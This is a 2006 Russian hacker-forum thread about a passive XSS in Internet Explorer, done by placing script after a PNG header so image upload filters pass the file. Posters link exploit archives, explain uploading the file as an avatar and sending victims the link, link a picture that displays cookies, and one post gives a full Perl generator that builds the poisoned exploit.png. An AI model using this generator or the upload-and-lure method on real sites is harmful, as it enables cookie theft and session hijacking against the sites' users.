Пассивиная Xss для браузера IE методом обхода граффического фильтра

Discussion in 'Уязвимости' started by __XT__, 12 Nov 2006.

  1. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    Пассивная XSS во всех версиях IE
    уязвимо очень много ресурсов...практически все open sources проекты.
    самопальные движки, форумы, гостевые и т.п.

    Предистория:
    ---
    В феврале 2006 года состояв в хакерско-флудерском клане IFF
    меня заинтересовало что в некоторых ресурсах можно закачать картинку со скриптом
    и в браузерах IE скрипт выполниться.
    Только практически везде стоит фильтрация граффических файлов.
    И тогда я за два дня сделал прорыв в XSS-строении.

    Я нашёл как обходить 90% фильтров.
    Дело в том что большинство картинок проверяються по хеадеру первым байтам.
    Заголовку.
    Я нашёл что в файлах .png формата можно вставлять скрипт после хеадера
    тем самым большинство фильтров проверяя заголовок пропускали картинку
    с внедрённым скриптом.
    ----


    Хотя уязвимость я публиковал раньше...уязвимость до сех пор считаеться приват.



    Авторская статья:
    http://kodsweb.ru/texts/ie_graphics_xss.txt

    приватный (первая експлутация уязвимости - пример):
    http://www.kodsweb.ru/bugs/png_expl.rar (autor exploiting)

    публичный експлойт сделал K@t00x:
    http://www.kodsweb.ru/sploits/ie_xss_bypass.rar



    Уязвимость в .png была представлена мной в конкурсной работе на фестивале
    Chaos Constructions 2006 (SET-CMS XSS)
    ftp://ftp.cc.org.ru/pub/2006/hack_video/airsg-cc6.zip
     
    #1 __XT__, 12 Nov 2006
    Last edited: 14 Nov 2006
    1 person likes this.
  2. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    вот мой вклад в Xss-строение
     
    1 person likes this.
  3. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    а почему пассивная??
     
  4. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    пассивная потому..что тебе надо давать жертве ссылку на загруженный скажем аватар со скриптом.
    т.е. это пассивная атака.

    Другое дело еслиб к приемру вставка скрипта происходила в форуме, и тебе не надо б было нечего жертве давать.

    КОнечно тут спорный вопрос активная или пассивная Xss в експлойте этом.
    Но я подразумевая под активной Xss это когда ты оставил внедрённый скрипт на видном месте, в форуме, в хостевой и т.п.
    А под пассивной когда ты формируешь запрос или картинка со скриптом...тут тебе придёться впарить жертвее чтобы зашла на ссылку.
     
  5. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    я бы причислил ее к полуактивным, т.к. сам код подгружается на сайт..
    но не в этом дело, а в том, что не получаится у меня ее заюзать. Ты уверен, что работает во всех версиях Ie, или, может уже выходили какие-нибудь патчи от нее?
     
  6. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    работает во всех версиях Ie со стандартными настройками безопасности.
    Ты неправильно наверное её юзал.
    Закачал к примеру сплойт в качестве аватары..залез в хтмл код и нашёл ссылку на аватару...если она неполная делай полный путь и вставляй в урл...вот и пассивная Xss
     
  7. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    нефига у меня не пашет, я выставил все настройки "по умолчанию", загружаю картинку на сайт, захожу по ссылке - ничего.. (как ее можно неправильно заюзать-то?? =))
    пробовал и сам сделать картинку, тоже не выходит...
     
  8. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    "нефига у меня не пашет, я выставил все настройки "по умолчанию", загружаю картинку на сайт, захожу по ссылке - ничего.. (как ее можно неправильно заюзать-то?? =))
    пробовал и сам сделать картинку, тоже не выходит..."

    1) УДостоверься что у тебя браузер Internet Explorer
    2) Експлойт тестировался на браузерах =< IE 6.0
    3) Фильтр не загружает картинку, т.к. картинка повреждена.
    - я специально написал ОБХОДИТ 90% фильтров а не 100% -
    К примеру на этом форуме проверь екплойт - у меня XSS работала.
    4) .....всётки я надеюсь что ты знаешь что такое пассивная XSS
    =)))
    вроде всё
     
    1 person likes this.
  9. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Дай ссылку на ту картинку что у тебя не работает.
     
  10. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    вот тут выложил
    _http://www.exploitedpng.pochta.ru/exploited.png

    ===добавлено====>

    в общем, я разобрался - похоже gui-версия сплоита не пашет, с помощью нее и создана картинка по ссылке выше..

    рабочая картинка, выводящая куки:
    _http://www.exploitedpng.pochta.ru/exploit.png

    сплоит, кстати говоря, отличный (не пойму, почему у автора до сих пор так мало репы =))..
     
    #10 Digimortal, 14 Nov 2006
    Last edited: 14 Nov 2006
  11. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    У автора уязвимости : репы вообще нет-(((

    У автора публичного експлойта: K@t00x'а
    думмаю репа есть=)))
     
  12. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    эххх репа....
     
  13. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    флудер, мля... =)
    кстати, имхо сплоиты в виде батника и нескольких файлов не рульно..
    Code:
    #!/usr/bin/perl
    
    # Internet Explorer png XSS exploit
    
    $poison="<html>
    <script>alert('XSS')</script>
    </html>"; # <==  enter your html'n'javascript code here...
    
    $a1="\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00\x01\x73\x52\x47\x42\x00\xAE\xCE\x1C\xE9\x00\x00\x00\x04\x67\x41\x4D\x41\x00\x00\xB1\x8F\x0B\xFC\x61\x05\x00\x00\x00\x20\x63\x48\x52\x4D\x00\x00\x7A\x26\x00\x00\x80\x84\x00\x00\xFA\x00\x00\x00\x80\xE8\x00\x00\x75\x30\x00\x00\xEA\x60\x00\x00\x3A\x98\x00\x00\x17\x70\x9C\xBA\x51\x3C\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0B\x13\x00\x00\x0B\x13\x01\x00\x9A\x9C\x18\x00\x00\x00\x0B\x49\x44\x41\x54\x18\x57\x63\xF8\x0F\x04\x00\x09\xFB\x03\xFD\x2B\xD5\x08\x45\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82\x1A";
    
    $a2="\x00\x7A\x26\x00\x00\x80\x84\x00\x00\xFA\x00\x00\x00\x80\xE8\x00\x00\x75\x30\x00\x00\xEA\x60\x00\x00\x3A\x98\x00\x00\x17\x70\x9C\xBA\x51\x3C\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0B\x13\x00\x00\x0B\x13\x01\x00\x9A\x9C\x18\x00\x00\x00\x0B\x49\x44\x41\x54\x18\x57\x63\xF8\x0F\x04\x00\x09\xFB\x03\xFD\x2B\xD5\x08\x45\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82";
    
    open FILE, ">exploit.png";
    print FILE $a1,$poison,$a2;
    close FILE;
    
    # eof
     
    #13 Digimortal, 23 Nov 2006
    Last edited: 23 Nov 2006
    1 person likes this.
  14. __XT__

    __XT__ Elder - Старейшина

    Joined:
    7 Nov 2006
    Messages:
    10
    Likes Received:
    17
    Reputations:
    7
    Digimortal:
    согласен что не рульно...только мой приват я хексом делал без праблов.
    А паблик Кактуса мне больше нравиться чем твой пёрл-експлойтинг.
    Дабы паблик на паблик и расичтан=))))
    не у каждого киддиса интерпритатор пёрла есть.
    Спасибо за очередную версию!
     
    #14 __XT__, 27 Nov 2006
    Last edited: 27 Nov 2006
    1 person likes this.